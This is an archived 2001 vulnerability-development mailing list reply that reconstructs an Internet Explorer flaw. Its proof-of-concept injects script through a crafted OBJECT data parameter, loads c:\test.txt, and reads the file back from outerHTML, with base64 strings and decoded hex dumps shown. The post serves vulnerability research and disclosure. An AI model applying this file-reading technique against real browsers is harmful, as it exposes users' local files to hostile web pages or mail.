Vulnerability Development mailing list archives
Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer
From: Markus Kern <markus-kern () gmx net>
Date: Fri, 23 Nov 2001 17:18:41 +0100
[Had to resent everything because the original HTML file was rejected. Sorry if anyone gets it twice.]
NOMEN NESCIO SECURITY ALERT #9000989 666 Topic: Remote File Execution By Web or Mail: Internet Explorer Severity: Critical Datum: 2001-11-21
There is a critical flaw within the html parser of Internet Explorer and its interpretation of certain html tags relative to the HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed key.
In accordance with the new suggested policy of responsible disclosure, no exploit and no further details will be made available at this time to the general public or the vendor. In 60 days from publication of this advisory full working exploits and details will be made available to the general public and vendor at the same time.
I don't want to bother anyone with my opinion on partial disclosure so here is just what I came up with after two hours of playing with IE. The advisory mentioned HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed so creating an object of that type is probably a good idea... <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"> </OBJECT> Ok, alert(myObject.outerHTML); gives us the following: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw OzwvcD4= ></OBJECT> Decoding the Base64 string we get (hex dump): 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C703E266E627370 3B3C2F703E <p> </p> The first part is a GUID and the second one looks like HTML. We inject the string "<script>document.location.href="file://c:\\test.txt";</script>" into the object using <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13" data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+ ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+"> </OBJECT> (There are probably easier ways to do this but I'm not very familiar with IE coding). Now to the the interesting part. After c:\test.txt is loaded we can still access the data parameter of the object using myObject.outerHTML. This time it contains the Base64 encoded version of c:\\test.txt among other things. So doing a alert(myObject.outerHTML); after the local file is loaded we get: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9 FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT> with the Base64 string decoding to: 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C21444F43545950 452048544D4C2050 <!DOCTYPE.HTML.P 55424C494320222D 2F2F5733432F2F44 UBLIC."-//W3C//D 54442048544D4C20 342E30205472616E TD.HTML.4.0.Tran 736974696F6E616C 2F2F454E223E0D0A sitional//EN">.. 3C48544D4C3E3C48 4541443E0D0A3C4D <HTML><HEAD>..<M 4554412068747470 2D65717569763D43 ETA.http-equiv=C 6F6E74656E742D54 79706520636F6E74 ontent-Type.cont 656E743D22746578 742F68746D6C3B20 ent="text/html;. 636861727365743D 77696E646F77732D charset=windows- 31323532223E3C2F 484541443E0D0A3C 1252"></HEAD>..< 424F44593E3C584D 503E68656C6C6F20 BODY><XMP>hello. 776F726C643C2F58 4D503E3C2F424F44 world</XMP></BOD 593E3C2F48544D4C 3E0D0A Y></HTML>.. where "hello world" is the contents of c:\test.txt. It all boils down to an ordinary DOM circumvention with all the usual implications. The attached exploit reads c:\test.txt and displays it. I've only tested this on Windows 2k pro with IE 5.50 so confirmation on other OSes / versions is welcome. regards, Markus Kern
Attachment:
htmlfile_FWE-exploit.zip
Description:
Current thread:
- [ALERT] Remote File Execution By Web or Mail: Internet Explorer hush . little . baby (Nov 21)
- RE: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Steve (Nov 21)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Mariusz Mazur (Nov 22)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Robert Collins (Nov 22)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Bill Weiss (Nov 22)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Glenn Valenta (Nov 23)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Bill Weiss (Nov 25)
- Re[2]: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Mariusz Mazur (Nov 23)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Markus Kern (Nov 23)
- <Possible follow-ups>
- RE: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Ben Smee (Nov 22)
- Re[2]: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Mariusz Mazur (Nov 23)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer Thomas Schweikle (Nov 27)
- Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer terry white (Nov 27)